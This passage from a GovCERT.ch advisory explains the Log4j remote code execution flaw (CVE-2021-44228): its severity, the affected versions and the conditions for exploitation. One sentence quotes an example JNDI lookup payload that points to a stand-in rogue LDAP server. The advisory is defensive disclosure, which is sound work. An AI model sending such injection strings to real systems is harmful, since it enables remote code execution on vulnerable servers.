Published on December 12, 2021 19:20 +0100 by GovCERT.ch (permalink)Last updated on December 12, 2021 19:20 +0100
On Friday morning, NCSC/GovCERT.ch received reports about a critical vulnerability in a popular Java library called “Log4j”. At the time of receiving these reports, the vulnerability apparently has been exploited by threat actors “in the wild” and no patch was available to fix the vulnerability (0-day exploit).
Log4j is a popular Java library developed and maintained by the Apache foundation. The library is widely adopted and used in many commercial and open-source software products as a logging framework for Java.
The vulnerability (CVE-2021-44228 ) is critical, as it can be exploited from remote by an unauthenticated adversary to executed arbitrary code (remote code execution – RCE). The criticality of the vulnerability has a score of 10 (out of 10) in the common vulnerability scoring system (CVSS) which outlines how severe the vulnerability is.
The vulnerability results from how log messages are being handled by the log4j processor. If an attacker sends a specially crafted message (it contains a string like ${jndi:ldap://rogueldapserver.com/a}), this may result in loading an external code class or message lookup and the execution of that code, leading to a situation that is known as Remote Code Execution (RCE).
But the vulnerability is also kind of complex: While certain products may be vulnerable, it doesn’t necessary mean that the vulnerability can be successfully exploited as this depends on several pre- and postconditions such as the JVM being used, the actual configuration, etc. Any version of log4j between versions 2.0 and 2.14.1 are affected.
As soon as a patch got released on Friday afternoon, we published an ..
Support the originator by clicking the read the rest link below.
